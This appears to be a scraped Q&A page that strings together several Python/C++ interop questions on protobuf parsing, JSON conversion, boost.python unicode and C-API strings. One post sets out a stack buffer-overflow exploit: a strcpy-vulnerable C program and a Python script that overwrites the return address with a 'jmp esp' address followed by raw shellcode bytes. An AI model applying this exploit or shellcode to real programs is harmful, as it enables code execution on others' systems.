Converting Python ProtoBuf to C++ ProtoBuf using SerializeToString() and ParseFromString() functions

Converting Python ProtoBuf to C++ ProtoBuf using SerializeToString() and ParseFromString() functions - python

Hi I've a simple example of addressbook.proto I am serializing using the protobuf SerailizeToString() function in python. Here's the code.
import address_pb2
person = address_pb2.Person()
person.id = 1234
person.name = "John Doe"
person.email = "jdoe#example.com"
phone = person.phones.add()
phone.number = "555-4321"
phone.type = address_pb2.Person.HOME
print(person.SerializeToString())
Where address_pb2 is the file I generated from the protobuf compiler. Note that the example is copied from the protoBuf tutorials. This gives me the following string.
b'\n\x08John Doe\x10\xd2\t\x1a\x10jdoe#example.com"\x0c\n\x08555-4321\x10\x01'
Now I want to import this string into c++ protobuf. For this I wrote the following code.
#include <iostream>
#include <fstream>
#include <string>
#include "address.pb.h"
using namespace std;
int main(int argc, char* argv[]) {
GOOGLE_PROTOBUF_VERIFY_VERSION;
tutorial::AddressBook address_book;
string data = "\n\x08""John Doe\x10""\xd2""\t\x1a""\x10""jdoe#example.com\"\x0c""\n\x08""555-4321\x10""\x01""";
if(address_book.ParseFromString(data)){
cout<<"working"<< endl;
}
else{
cout<<"not working" << endl;
}
// Optional: Delete all global objects allocated by libprotobuf.
google::protobuf::ShutdownProtobufLibrary();
return 0;
}
Here I am simply trying to import the script using ParseFromString() fucntion but this doesn't work and I am not sure how it will work as I've been stuck on this since a long time now.
I tried changing the binary a bit to suit the c++ version but still no idea if I am on the right path or not.
How can I achieve this ? Does anybody have a clue ?

In Python, you are serializing a Person object. In C++, you are trying to parse an AddressBook object. You need to use the same type on both ends.
(Note that protobuf does NOT guarantee that it will detect these errors. Sometimes when you parse a message as the wrong type, the parse will appear to succeed, but the content will be garbage.)
There's another issue with your code that happens not to be a problem in this specific case, but wouldn't work in general:
string data = "\n\x08""John Doe\x10""\xd2""\t\x1a""\x10""jdoe#example.com\"\x0c""\n\x08""555-4321\x10""\x01""";
This line won't work if the string has any NUL bytes, i.e. '\x00'. If so, that byte would be interpreted as the end of the string. To avoid this problem you need to specify the length of the data, like:
string data("\n\x08""John Doe\x10""\xd2""\t\x1a""\x10""jdoe#example.com\"\x0c""\n\x08""555-4321\x10""\x01""", 45);

Related

Change C++ structure to JSON string using python

Is there any way to convert an c++ structure to JSON string using Python?
I have multiple c++ files that contain structure for example as following
#include <iostream>
using namespace std;
struct Person
{
char name[50];
int age;
float salary;
};
I want to convert it to JSON string. so I can use JSON string in my python project.
Thanks in Advance.

JSON is a standardized format and there are libraries for neraly every common programming language that will help you with that.
I am not sure what exactly you are asking; do you really want to convert a c++ file (containing a c/c++ structure) with Python? There are c++ libraries which can do that for you, too
Read this article about c++ and JSON.

If you want to convert a C++ struct to JSON string, there are a lot of libraries to do that. In my example, I am using https://github.com/nlohmann/json
#include <iostream>
#include "json.hpp"
using namespace std;
using json = nlohmann::json;
struct Person
{
string name;
int age;
float salary;
};
int main()
{
Person p;
p.name = "Shivam";
p.age = 7;
p.salary = 45.0;
// creating json
json j;
j["name"] = p.name;
j["age"] = p.age;
j["salary"] = p.salary;
string s = j.dump();
cout<<s<<endl;
// pretty print
cout<<j.dump(4)<<endl;
return 1;
}

Sometimes some of my bytes disappear in my exploit. Why?

I try write my own exploit. The idea is simple - overwrite return address to place where is opcode 'jmp esp'. In esp is address of my shellcode.
So I have this simple program:
#include <stdio.h>
#include <string.h>
void do_something(char *Buffer)
{
char MyVar[100];
strcpy(MyVar,Buffer);
}
int main (int argc, char **argv)
{
do_something(argv[1]);
return 0;
}
My exploit have been written in python. Code: (I think that my shellcode not work, but it is not important now)
import os
import subprocess
out = '\x48' * 112
out = out + <address of 'jmp esp' opcode>
out = out + '\xcc\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x36\x8B\x06\x8B\x68 \x08\xEB\x20\x5B\x53\x55\x5B\x81\xEB\x11\x11\x11\x11\x81\xC3\xDA\x3F\x1A\x11\xFF\xD3\x81\xC3\x11\x11\x11\x11\x81\xEB\x8C\xCC\x18\x11\xFF\xD3\xE8\xDB\xFF\xFF\xFF\x63\x6d\x64'
subprocess.call(['SimpleExploit.exe', out])
If address of 'jmp esp' opcode I have set for 0x41414141: (AAAA)
everything is ok (of course 0x41414141 is not good address, but I can see that memory has been overwritten)
My problem starts if I put correctly address. I found 0x7769E24D, so I used this value and after that in ollydbg I seen:
And this is my question: Why memory looks different? It looks like that one line has been removed. But why? Interesting thing is that If I change only one byte (0x77 to 0x41), memory is overwrite with correct value.
The second problem is that some of my bytes are transform to different values - for example 0x8b to 0x3f.
Could somebody tell me why this happen? Maybe this is a kind of protection? It is something with my operation system? I use Windows 8.1 x64.

how to extract a unicode string with boost.python

It seems that the code will crash when I do extract<const char*>("a unicode string")
Anyone know how to solve this?

This compiles and works for me, with your example string and using Python 2.x:
void process_unicode(boost::python::object u) {
using namespace boost::python;
const char* value = extract<const char*>(str(u).encode("utf-8"));
std::cout << "The string value is '"<< value << "'" << std::endl;
}
You can write a specific from-python converter, if you wish to auto-convert PyUnicode (#Python2.x) to const wchar_t* or to a type from ICU (that seems to be the common recommendation for dealing with Unicode on C++).
If you want full support to unicode characters which are not in the ASCII range (for example, accented characters such as á, ç or ï, you will need to write the from-python converter. Note this will have to be done separately for Python 2.x and 3.x, if you wish to support both. For Python 3.x, the PyUnicode type was deprecated and now the string type works as PyUnicode used to for Python 2.x. Nothing that a couple of #if PY_VERSION_HEX >= 0x03000000 cannot handle.
[edit]
The above comment was wrong. Note that, since Python 3.x treats unicode strings as normal strings, boost::python will wrap that into boost::python::str objects. I have not verified how those are handled w.r.t. unicode translation in this case.

Have you tried
extract<std::string>("a unicode string").c_str()
or
extract<wchar_t*>(...)

Python to C/C++ const char question

I am extending Python with some C++ code.
One of the functions I'm using has the following signature:
int PyArg_ParseTupleAndKeywords(PyObject *arg, PyObject *kwdict,
char *format, char **kwlist, ...);
(link: http://docs.python.org/release/1.5.2p2/ext/parseTupleAndKeywords.html)
The parameter of interest is kwlist. In the link above, examples on how to use this function are given. In the examples, kwlist looks like:
static char *kwlist[] = {"voltage", "state", "action", "type", NULL};
When I compile this using g++, I get the warning:
warning: deprecated conversion from string constant to ‘char*’
So, I can change the static char* to a static const char*. Unfortunately, I can't change the Python code. So with this change, I get a different compilation error (can't convert char** to const char**). Based on what I've read here, I can turn on compiler flags to ignore the warning or I can cast each of the constant strings in the definition of kwlist to char *. Currently, I'm doing the latter. What are other solutions?
Sorry if this question has been asked before. I'm new.

Does PyArg_ParseTupleAndKeywords() expect to modify the data you are passing in? Normally, in idiomatic C++, a const <something> * points to an object that the callee will only read from, whereas <something> * points to an object that the callee can write to.
If PyArg_ParseTupleAndKeywords() expects to be able to write to the char * you are passing in, you've got an entirely different problem over and above what you mention in your question.
Assuming that PyArg_ParseTupleAndKeywords does not want to modify its parameters, the idiomatically correct way of dealing with this problem would be to declare kwlist as const char *kwlist[] and use const_cast to remove its const-ness when calling PyArg_ParseTupleAndKeywords() which would make it look like this:
PyArg_ParseTupleAndKeywords(..., ..., ..., const_cast<char **>(kwlist), ...);

There is an accepted answer from seven years ago, but I'd like to add an alternative solution, since this topic seems to be still relevant.
If you don't like the const_cast solution, you can also create a write-able version of the string array.
char s_voltage[] = "voltage";
char s_state[] = "state";
char s_action[] = "action";
char s_type[] = "type";
char *kwlist[] = {s_voltage, s_state, s_action, s_type, NULL};
The char name[] = ".." copies the your string to a writable location.

Python c-api and unicode strings

I need to convert between python objects and c strings of various encodings. Going from a c string to a unicode object was fairly simple using PyUnicode_Decode, however Im not sure how to go the other way
//char* can be a wchar_t or any other element size, just make sure it is correctly terminated for its encoding
Unicode(const char *str, size_t bytes, const char *encoding="utf-16", const char *errors="strict")
:Object(PyUnicode_Decode(str, bytes, encoding, errors))
{
//check for any python exceptions
ExceptionCheck();
}
I want to create another function that takes the python Unicode string and puts it in a buffer using a given encodeing, eg:
//fills buffer with a null terminated string in encoding
void AsCString(char *buffer, size_t bufferBytes,
const char *encoding="utf-16", const char *errors="strict")
{
...
}
I suspect it has somthing to do with PyUnicode_AsEncodedString however that returns a PyObject so I'm not sure how to put that into my buffer...
Note: both methods above are members of a c++ Unicode class that wraps the python api
I'm using Python 3.0

I suspect it has somthing to do with PyUnicode_AsEncodedString however that returns a PyObject so I'm not sure how to put that into my buffer...
The PyObject returned is a PyStringObject, so you just need to use PyString_Size and PyString_AsString to get a pointer to the string's buffer and memcpy it to your own buffer.
If you're looking for a way to go directly from a PyUnicode object into your own char buffer, I don't think that you can do that.

We Keep Coding

Python is a programming language that lets you work quickly and integrate systems more effectively.

Converting Python ProtoBuf to C++ ProtoBuf using SerializeToString() and ParseFromString() functions - python

Related

Change C++ structure to JSON string using python

Sometimes some of my bytes disappear in my exploit. Why?

how to extract a unicode string with boost.python

Python to C/C++ const char question

Python c-api and unicode strings

Categories

Resources